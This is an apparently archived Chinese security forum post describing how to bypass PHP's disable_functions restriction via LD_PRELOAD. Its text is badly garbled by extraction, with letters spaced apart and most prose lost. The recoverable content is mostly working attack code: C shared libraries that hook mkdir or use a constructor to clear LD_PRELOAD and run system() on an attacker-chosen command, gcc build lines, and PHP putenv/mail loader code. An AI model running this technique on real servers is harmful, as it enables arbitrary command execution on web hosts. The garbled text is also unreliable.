[353] 2020-11-07_LD_PRELOAD绕过disable_functions

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-16
2020-11-07_LD_PRELOAD绕过disable_functions L D _ P R E L O A D d i s a b l e _ f u n c t i o n s   a F a   a F a   2 0 2 0 - 1 1 - 0 7   #   , 1 4 L D _ P R E L O A D L i n u x a b L D _ P R E L O A D b a b 使 L D _ P R E L O A D d i s a b l e _ f u n c t i o n s m a i l p u t e n v m a i l p h p s t r a c e m a i l f g r e p e x e c v e e x e c v e < ? p h p         m a i l ( ' ' , ' ' , ' ' , ' ' , ) ; ? > s t r a c e   - f   p h p   a . p h p   2 > & 1   |   g r e p   e x e c v e
p h p m a i l l i n u x s h s e n d m a i l s e n d m a i l L D _ P R E L O A D p h p m a i l s e n d m a i l 使 r e a d e l f e l f s o a s m k d i r g e t u i d m k d i r t e s t . c u n s e t e n v m a i l L D _ P R E L O A D p h p L D _ P R E L O A D u n s e t e n v c e n t o s c e n t o s h o o k   u n s e t e n v u n s e t e n v h o o k r e a d e l f   - s   / u s r / s b i n / s e n d m a i l # i n c l u d e   < s t d l i b . h > # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t r i n g . h > i n t   m k d i r ( ) {         / /   L D _ P R E L O A D         u n s e t e n v ( " L D _ P R E L O A D " ) ;         s y s t e m ( " w h o a m i   >   / t m p / w h o a m i " ) ; }
使 L D _ P R E L O A D u n s e t e n v f o r L D _ P R E L O A D 0 0 L D _ P R E L O A D c . c c e n t o s s o s o p h p p h p t m p w h o a m i 1 l i n u x a p a c h e w w w - d a t a w w w - d a t a s e n d m a i l a p a c h e s e n d m a i l 访 s e l i n u x s e l i n u x l i n u x g e t e n f o r c e # i n c l u d e   < s t d l i b . h > # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t r i n g . h > e x t e r n   c h a r * *   e n v i r o n ; i n t   m k d i r ( ) {         i n t   i ;         f o r ( i   =   0 ;   e n v i r o n [ i ] ;   + + i ) {                 i f   ( s t r s t r ( e n v i r o n [ i ] ,   " L D _ P R E L O A D " ) ) {                         e n v i r o n [ i ] [ 0 ]   =   ' 0 ' ;                 }         }         s y s t e m ( " w h o a m i   >   / t m p / w h o a m i " ) ; } g c c   - c   - f P I C   c . c   - o   s o   & &   g c c   - - s h a r e   s o   - o   s o . s o < ? p h p     p u t e n v ( " L D _ P R E L O A D = . / s o . s o " ) ;     m a i l ( ' ' , ' ' , ' ' , ' ' ) ; ? >
s e l i n u x d i s a b l e _ f u n c t i o n s s e n d m a i l s e n d m a i l s e n d m a i l 使 c _ _ a t t r i b u t e _ _   ( ( _ _ c o n s t r u c t o r _ _ ) ) m a i n # d e f i n e   _ G N U _ S O U R C E # i n c l u d e   < s t d l i b . h > # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t r i n g . h > e x t e r n   c h a r * *   e n v i r o n ; _ _ a t t r i b u t e _ _   ( ( _ _ c o n s t r u c t o r _ _ ) )   v o i d   p r e l o a d   ( v o i d ) {         / /   g e t   c o m m a n d   l i n e   o p t i o n s   a n d   a r g         c o n s t   c h a r *   c m d l i n e   =   g e t e n v ( " E V I L _ C M D L I N E " ) ;         / /   u n s e t   e n v i r o n m e n t   v a r i a b l e   L D _ P R E L O A D .         / /   u n s e t e n v ( " L D _ P R E L O A D " )   n o   e f f e c t   o n   s o m e           / /   d i s t r i b u t i o n   ( e . g . ,   c e n t o s ) ,   I   n e e d   c r a f t y   t r i c k .         i n t   i ;         f o r   ( i   =   0 ;   e n v i r o n [ i ] ;   + + i )   {                         i f   ( s t r s t r ( e n v i r o n [ i ] ,   " L D _ P R E L O A D " ) )   {                                         e n v i r o n [ i ] [ 0 ]   =   ' 0 ' ;                         }         }         / /   e x e c u t i v e   c o m m a n d         s y s t e m ( c m d l i n e ) ; }
h t t p s : / / g i t h u b . c o m / y a n g y a n g w i t h g n u / b y p a s s _ d i s a b l e f u n c _ v i a _ L D _ P R E L O A D 使 v u l t r d e b i a n c e n t o s s e l i n u x l i n u x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则